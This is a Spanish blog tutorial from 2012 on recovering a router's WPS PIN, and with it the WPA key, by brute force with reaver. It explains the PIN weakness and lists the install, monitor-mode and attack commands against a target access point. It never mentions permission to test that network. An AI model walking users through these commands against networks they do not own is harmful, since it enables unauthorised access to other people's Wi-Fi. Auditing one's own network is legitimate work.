martes, 20 de marzo de 2012

Auditoria WIFI - WPA-WPS

Tras el tuto de WEP de hace 1 año, nos ponemos con redes WPA que usan WPS!

De nuevo la versión de linux es Ubuntu 10.04 LTS, suponemos que ya se tiene el aircrack-ng, sino vete pal tutorial de WEP!

El programa que usaremos es reaver, ésta es la pagina web del proyecto:

http://code.google.com/p/reaver-wps/

La lista de tarjetas compatibles la tenéis aquí:

http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers

Algo de teoria

La idea del programa es usar fuerza bruta para sacar los 8 dígitos de un PIN que usa WPS (wifi protected setup) para realizar la configuración de la tarjeta de red.

Así tendría que probar 10^8 (100.000.000 combinaciones), como que son muchas, la suerte es que: primero, el último dígito es un checksum, así que sacando los otros 7 tenemos el último, quedando en 10^7 (10.000.000 combinaciones), y segundo, el protocolo WPS divide el PIN en 2 partes, y las comprueba individualmente, así que tenemos que hacer 10^4+10^3 = 11000 comprobaciones y tenemos el PIN, luego la clave!

Éstas 11k peticiones son pocas comparadas con las 10^8 primeras, pero aun así son bastantes, suponiendo que el AP las procesa a una por segundo, tardará 11k segundos, unas 3 horas, pero en la realidad tardará bastante más, según el caso, a mi me tardo desde 6h a casi 1 día entero xD

Descarga e Instalación

Primero intentar si funciona instalarlo directametne de esta forma:

sudo apt-get install reaver

Antes de instalar el propio reaver, hacen falta 2 librerias, libpcap y libsqlite3. Para bajarlas:

sudo apt-get install libsqlite3-dev

sudo apt-get install libpcap-dev

Para el reaver nos descargamos la última versión desde la siguiente dirección:

http://code.google.com/p/reaver-wps/downloads/list

Y lo descomprimimos usando nautilus o con comandos con el tipico:

tar xzvf  file.tar.gz

Una vez descomprimido:

./configure
make
make install


Y debería ya estar instalado.

Uso

Primero ponemos la tarjeta en modo monitor usando el airmon

sudo airmon-ng start wlan0

Buscamos el objetivo  con airodump

sudo airodump-ng -tWPA mon0

Nos quedamos con la dirección MAC del AP.

Y ahora vamos a usar el reaver, tan fácil como:

reaver -i mon0 -b MACAP -vv

El -vv para que vaya mostrando info del proceso.

Con esto ya empezara a probar PINs, siempre que quieras puedes parar el proceso con control+c, y volver a empezar desde donde estaba (o no) escribiendo el mismo comando que lo empezó. Tenéís más parámetros pal programa en el readme:

http://code.google.com/p/reaver-wps/wiki/README

Consejos

A veces el reaver no cambia bien de canal la tarjeta y no consigue asociarse con el AP, para hacerlo a mano:

sudo iwconfig mon0 channel X

Si obtienes muchos timeouts y no aumenta la cuenta de PINs, puede ser porque no te llegue bien la señal, prueba a moverte por la casa xD.

Si obtienes un "rate limiting detected", es que el AP ha bloquedao el WPS, a veces es temporal, pero en otros casos es permanente, asi que estamso ante un caso de AP puñetero xD.

Para más info consultad la wiki del proyecto en la siguiente dirección:

http://code.google.com/p/reaver-wps/w/list

Le añadiré alguna que otra imagencilla en unos días!

Un saludo!

No hay comentarios:

Publicar un comentario

Ponte un nombre aunque sea falso, que Anó-nimo queda mu feo :(